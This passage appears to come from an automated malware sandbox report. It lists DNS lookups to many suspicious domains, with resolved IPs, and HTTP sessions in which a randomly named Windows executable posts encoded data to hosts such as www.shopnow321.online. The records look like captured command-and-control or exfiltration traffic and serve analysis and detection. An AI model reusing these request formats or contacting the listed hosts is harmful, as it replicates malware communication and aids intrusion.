Jun 5, 2024 18:29:53.502109051 CEST	53	62349	1.1.1.1	192.168.2.7
Jun 5, 2024 18:30:07.374159098 CEST	60473	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:30:07.684690952 CEST	53	60473	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 5, 2024 18:26:54.331760883 CEST	192.168.2.7	1.1.1.1	0x64fb	Standard query (0)	www.fr2e4o.cfd	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:26:59.699733973 CEST	192.168.2.7	1.1.1.1	0xbf45	Standard query (0)	www.futuregainers.net	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:15.496084929 CEST	192.168.2.7	1.1.1.1	0x9e6d	Standard query (0)	www.shopnow321.online	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:16.492803097 CEST	192.168.2.7	1.1.1.1	0x9e6d	Standard query (0)	www.shopnow321.online	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:29.949387074 CEST	192.168.2.7	1.1.1.1	0xd039	Standard query (0)	www.klimkina.pro	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:43.981256962 CEST	192.168.2.7	1.1.1.1	0xa85d	Standard query (0)	www.shahaf3d.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:58.496612072 CEST	192.168.2.7	1.1.1.1	0x7088	Standard query (0)	www.againbeautywhiteskin.asia	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:59.496294975 CEST	192.168.2.7	1.1.1.1	0x7088	Standard query (0)	www.againbeautywhiteskin.asia	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:28:13.778332949 CEST	192.168.2.7	1.1.1.1	0xd288	Standard query (0)	www.homeppower.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:28:21.859253883 CEST	192.168.2.7	1.1.1.1	0x34dd	Standard query (0)	www.lenovest.xyz	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:28:41.488004923 CEST	192.168.2.7	1.1.1.1	0x1a77	Standard query (0)	www.931951.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:28:55.246263027 CEST	192.168.2.7	1.1.1.1	0x19f1	Standard query (0)	www.srripaspocon.org	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:09.199626923 CEST	192.168.2.7	1.1.1.1	0xed45	Standard query (0)	www.x5hh186z.skin	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:17.297926903 CEST	192.168.2.7	1.1.1.1	0x51d1	Standard query (0)	www.torentreprenad.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:31.012716055 CEST	192.168.2.7	1.1.1.1	0x2e8b	Standard query (0)	www.grecanici.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:44.858705997 CEST	192.168.2.7	1.1.1.1	0xdf1b	Standard query (0)	www.navigate-power.boats	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:52.950803995 CEST	192.168.2.7	1.1.1.1	0xb2bd	Standard query (0)	www.93v0.com	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:30:07.374159098 CEST	192.168.2.7	1.1.1.1	0xf6e5	Standard query (0)	www.leadchanges.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 5, 2024 18:26:54.689910889 CEST	1.1.1.1	192.168.2.7	0x64fb	Name error (3)	www.fr2e4o.cfd	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:26:59.761246920 CEST	1.1.1.1	192.168.2.7	0xbf45	No error (0)	www.futuregainers.net	futuregainers.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 18:26:59.761246920 CEST	1.1.1.1	192.168.2.7	0xbf45	No error (0)	futuregainers.net		195.35.39.119	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:16.671544075 CEST	1.1.1.1	192.168.2.7	0x9e6d	No error (0)	www.shopnow321.online	shopnow321.online		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 18:27:16.671544075 CEST	1.1.1.1	192.168.2.7	0x9e6d	No error (0)	shopnow321.online		162.241.2.254	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:16.685754061 CEST	1.1.1.1	192.168.2.7	0x9e6d	No error (0)	www.shopnow321.online	shopnow321.online		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 18:27:16.685754061 CEST	1.1.1.1	192.168.2.7	0x9e6d	No error (0)	shopnow321.online		162.241.2.254	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:30.259701967 CEST	1.1.1.1	192.168.2.7	0xd039	No error (0)	www.klimkina.pro		185.137.235.103	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:30.259701967 CEST	1.1.1.1	192.168.2.7	0xd039	No error (0)	www.klimkina.pro		185.137.235.193	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:30.259701967 CEST	1.1.1.1	192.168.2.7	0xd039	No error (0)	www.klimkina.pro		185.137.235.77	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:30.259701967 CEST	1.1.1.1	192.168.2.7	0xd039	No error (0)	www.klimkina.pro		185.137.235.125	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:30.259701967 CEST	1.1.1.1	192.168.2.7	0xd039	No error (0)	www.klimkina.pro		185.137.235.192	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:44.240690947 CEST	1.1.1.1	192.168.2.7	0xa85d	No error (0)	www.shahaf3d.com	shahaf3d.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 18:27:44.240690947 CEST	1.1.1.1	192.168.2.7	0xa85d	No error (0)	shahaf3d.com		64.46.118.35	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:59.664191008 CEST	1.1.1.1	192.168.2.7	0x7088	No error (0)	www.againbeautywhiteskin.asia	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 18:27:59.664191008 CEST	1.1.1.1	192.168.2.7	0x7088	No error (0)	dns.ladipage.com		13.228.81.39	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:59.664191008 CEST	1.1.1.1	192.168.2.7	0x7088	No error (0)	dns.ladipage.com		18.139.62.226	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:59.664191008 CEST	1.1.1.1	192.168.2.7	0x7088	No error (0)	dns.ladipage.com		54.179.173.60	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:59.664319992 CEST	1.1.1.1	192.168.2.7	0x7088	No error (0)	www.againbeautywhiteskin.asia	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 18:27:59.664319992 CEST	1.1.1.1	192.168.2.7	0x7088	No error (0)	dns.ladipage.com		13.228.81.39	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:59.664319992 CEST	1.1.1.1	192.168.2.7	0x7088	No error (0)	dns.ladipage.com		18.139.62.226	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:27:59.664319992 CEST	1.1.1.1	192.168.2.7	0x7088	No error (0)	dns.ladipage.com		54.179.173.60	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:28:13.790096998 CEST	1.1.1.1	192.168.2.7	0xd288	Name error (3)	www.homeppower.com	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:28:21.900665045 CEST	1.1.1.1	192.168.2.7	0x34dd	No error (0)	www.lenovest.xyz		162.0.213.94	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:28:41.887233973 CEST	1.1.1.1	192.168.2.7	0x1a77	No error (0)	www.931951.com		172.82.177.221	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:28:55.758563042 CEST	1.1.1.1	192.168.2.7	0x19f1	No error (0)	www.srripaspocon.org	srripaspocon.org		CNAME (Canonical name)	IN (0x0001)	false
Jun 5, 2024 18:28:55.758563042 CEST	1.1.1.1	192.168.2.7	0x19f1	No error (0)	srripaspocon.org		15.204.0.108	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:09.220150948 CEST	1.1.1.1	192.168.2.7	0xed45	Name error (3)	www.x5hh186z.skin	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:17.370260000 CEST	1.1.1.1	192.168.2.7	0x51d1	No error (0)	www.torentreprenad.com		194.9.94.86	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:17.370260000 CEST	1.1.1.1	192.168.2.7	0x51d1	No error (0)	www.torentreprenad.com		194.9.94.85	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:31.027184963 CEST	1.1.1.1	192.168.2.7	0x2e8b	No error (0)	www.grecanici.com		35.214.235.206	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:44.868803978 CEST	1.1.1.1	192.168.2.7	0xdf1b	Name error (3)	www.navigate-power.boats	none	none	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:29:53.502109051 CEST	1.1.1.1	192.168.2.7	0xb2bd	No error (0)	www.93v0.com		18.178.206.118	A (IP address)	IN (0x0001)	false
Jun 5, 2024 18:30:07.684690952 CEST	1.1.1.1	192.168.2.7	0xf6e5	No error (0)	www.leadchanges.info		66.96.162.149	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.futuregainers.net

www.shopnow321.online

www.klimkina.pro

www.shahaf3d.com

www.againbeautywhiteskin.asia

www.lenovest.xyz

2.56.245.142

www.931951.com

www.srripaspocon.org

www.torentreprenad.com

www.grecanici.com

www.93v0.com

www.leadchanges.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49709	195.35.39.119	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:26:59.777451038 CEST	452	OUT	GET /l4k7/?9d=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+RkpzmaC/oeJhPADFzgiJMLR5FtBl6eht1vjrsMq9ONCaKj3k5GiGvog+&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1 Host: www.futuregainers.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:27:00.447798967 CEST	1235	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 05 Jun 2024 16:27:00 GMT server: LiteSpeed location: https://www.futuregainers.net/l4k7/?9d=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+RkpzmaC/oeJhPADFzgiJMLR5FtBl6eht1vjrsMq9ONCaKj3k5GiGvog+&G0a=VFN0vBc0ol1ljnb0 platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49711	162.241.2.254	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:16.685231924 CEST	717	OUT	POST /41br/ HTTP/1.1 Host: www.shopnow321.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.shopnow321.online Referer: http://www.shopnow321.online/41br/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 41 65 68 44 73 72 79 72 34 66 47 6b 71 2f 63 72 32 69 6c 56 31 4f 6d 50 36 78 6c 6b 6a 65 67 55 63 48 37 63 54 36 46 4c 77 72 76 52 5a 30 37 79 58 74 63 6c 4b 68 51 74 50 78 59 78 54 42 77 6b 53 61 79 65 49 53 30 7a 51 79 57 43 4a 72 75 36 42 71 78 5a 51 4a 74 4c 58 35 46 50 75 63 50 58 36 76 5a 46 39 54 64 37 58 35 63 64 6e 79 5a 72 53 58 51 34 7a 38 7a 75 66 73 63 47 44 67 38 34 5a 68 43 59 6e 34 35 35 4c 4e 48 65 79 77 6e 4d 76 42 48 31 63 36 4c 75 49 4b 51 77 6a 6c 47 2f 53 50 6d 37 41 5a 30 36 56 30 79 79 2f 45 4f 52 58 44 2f 72 42 6d 74 6b 6e 64 35 44 49 4f 78 70 4e 65 6e 6a 42 67 3d 3d Data Ascii: 9d=37p05Z2HjoMoAehDsryr4fGkq/cr2ilV1OmP6xlkjegUcH7cT6FLwrvRZ07yXtclKhQtPxYxTBwkSayeIS0zQyWCJru6BqxZQJtLX5FPucPX6vZF9Td7X5cdnyZrSXQ4z8zufscGDg84ZhCYn455LNHeywnMvBH1c6LuIKQwjlG/SPm7AZ06V0yy/EORXD/rBmtknd5DIOxpNenjBg==
Jun 5, 2024 18:27:17.310480118 CEST	1121	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:27:17 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 836 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED] Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1LuD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p\| 8J8-QXXD,B"^#n$uP"8\|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49712	162.241.2.254	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:19.221756935 CEST	737	OUT	POST /41br/ HTTP/1.1 Host: www.shopnow321.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.shopnow321.online Referer: http://www.shopnow321.online/41br/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 42 2f 52 44 71 4b 79 72 39 2f 47 6e 6d 66 63 72 68 79 6c 52 31 4f 36 50 36 30 45 76 6a 6f 59 55 66 6d 4c 63 42 4f 52 4c 7a 72 76 52 42 45 37 7a 54 74 63 75 4b 68 55 6c 50 7a 63 78 54 46 59 6b 53 62 43 65 4c 68 63 79 51 69 57 45 42 4c 75 34 50 4b 78 5a 51 4a 74 4c 58 35 42 6c 75 63 48 58 39 65 70 46 38 32 70 34 55 35 63 65 33 53 5a 72 42 48 51 43 7a 38 7a 41 66 75 34 38 44 6b 4d 34 5a 6a 4b 59 6e 73 6c 36 42 4e 48 69 74 67 6e 59 76 69 57 50 62 2f 6d 64 48 6f 34 65 69 57 47 4f 58 35 37 5a 61 37 34 57 4c 6c 4b 4a 37 47 71 6e 41 6c 69 65 44 6e 70 38 71 2f 4e 69 58 35 55 44 41 4d 47 6e 58 66 78 77 54 33 6d 2b 49 59 4d 78 49 65 78 54 33 38 32 6f 46 46 59 3d Data Ascii: 9d=37p05Z2HjoMoB/RDqKyr9/GnmfcrhylR1O6P60EvjoYUfmLcBORLzrvRBE7zTtcuKhUlPzcxTFYkSbCeLhcyQiWEBLu4PKxZQJtLX5BlucHX9epF82p4U5ce3SZrBHQCz8zAfu48DkM4ZjKYnsl6BNHitgnYviWPb/mdHo4eiWGOX57Za74WLlKJ7GqnAlieDnp8q/NiX5UDAMGnXfxwT3m+IYMxIexT382oFFY=
Jun 5, 2024 18:27:19.857146978 CEST	1121	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:27:19 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 836 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED] Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1LuD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p\| 8J8-QXXD,B"^#n$uP"8\|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49713	162.241.2.254	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:27:21.752670050 CEST	1750	OUT	POST /41br/ HTTP/1.1 Host: www.shopnow321.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.shopnow321.online Referer: http://www.shopnow321.online/41br/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 42 2f 52 44 71 4b 79 72 39 2f 47 6e 6d 66 63 72 68 79 6c 52 31 4f 36 50 36 30 45 76 6a 72 34 55 66 55 7a 63 54 63 35 4c 79 72 76 52 49 6b 37 75 54 74 63 33 4b 6c 77 68 50 7a 42 4f 54 48 51 6b 53 35 4b 65 4f 51 63 79 65 69 57 45 4e 72 75 35 42 71 78 4d 51 4a 64 50 58 35 52 6c 75 63 48 58 39 63 68 46 31 44 64 34 59 5a 63 64 6e 79 5a 6e 53 58 52 4d 7a 2f 44 32 66 75 39 4c 44 31 77 34 5a 41 69 59 68 66 4e 36 4e 4e 48 6b 75 67 6d 66 76 69 61 71 62 2b 50 6d 48 6f 67 30 69 55 57 4f 58 2f 57 66 50 49 45 5a 55 45 65 2f 36 45 4f 78 4b 54 2b 76 45 42 35 78 6c 6f 39 47 65 72 38 70 4f 4f 57 57 52 76 34 6e 4c 46 71 73 46 62 41 62 47 2b 63 34 6d 75 53 59 53 67 67 52 64 31 5a 69 4c 31 7a 45 56 68 53 51 4e 41 2f 43 30 57 53 6b 45 4f 42 75 41 57 59 59 31 53 66 2f 4f 45 6e 4f 30 71 53 76 6d 70 68 50 70 4a 31 4d 67 77 46 72 75 45 65 77 32 51 43 64 53 6a 6b 75 72 78 33 44 49 6e 65 75 64 63 51 6d 62 2f 67 4f 52 39 68 39 31 6d 53 32 30 67 71 5a 34 56 4b 32 52 72 58 70 48 4b 72 [TRUNCATED] Data Ascii: 9d=37p05Z2HjoMoB/RDqKyr9/GnmfcrhylR1O6P60Evjr4UfUzcTc5LyrvRIk7uTtc3KlwhPzBOTHQkS5KeOQcyeiWENru5BqxMQJdPX5RlucHX9chF1Dd4YZcdnyZnSXRMz/D2fu9LD1w4ZAiYhfN6NNHkugmfviaqb+PmHog0iUWOX/WfPIEZUEe/6EOxKT+vEB5xlo9Ger8pOOWWRv4nLFqsFbAbG+c4muSYSggRd1ZiL1zEVhSQNA/C0WSkEOBuAWYY1Sf/OEnO0qSvmphPpJ1MgwFruEew2QCdSjkurx3DIneudcQmb/gOR9h91mS20gqZ4VK2RrXpHKrOf5WAGFRvKuux0u+w8smCX6rr1pfIe4T6Io/9dadHY1hIFP2pXyb4SL99QbaAYVjm+/ldYoSnLgQgSrRTwFCSwGC8nltYGu0cPXVVSHe6KGtWPuxgq00LTbS4B8uKCkGNe9YMjmDLQbQ3TEuTIz0QELbSvVyNYV8yh70IOGC4sQk+Bh+782WWxOoCu6Skj7YWLkySe4Xy8whsKx1XiHI1pI6UWGhgHB24KLjuqfh4BDkJC3VQ8ZNAS01W5UXgQ0Q1LebN6m4Bc4SpyWONhPLCKdA56z8f6Pd/0vk2f0jbnckbVOI8OZCD7fPOV/O1+AuY58xky9p+mO9jvhXuijRezkbAicJak5sKtvImEJ5wi08ILcxpWp6cLI2ryuumGRUbNgFwBjJs7bw4FUkeaXWrdLi1fb3gdCToUOmK1M6DgZrxm7mmU05kv/f6vMk8LeuiZNVpSc1HWVZXPrOMDwxrMa9KulUdcfar696KfHg43gynyQM1fwu0MJ/2QJ7ZJaYmdkKdFNH5Y/mke1BQyD+VVPFOMfvHeXDLyMmP2N+1mKmNNXld7aOXz2endAv78Rlc8Rt94vzK/oM5fT9nzAwLFVt5IHpXVcT3X1HuPzX1pXLZn5gF0lw2elal8I3VdT8Nxr6Bj1GJ8ZUoqxObuOuCoTtxB+0er47OX [TRUNCATED]
Jun 5, 2024 18:27:22.385396004 CEST	1121	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:27:22 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 836 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 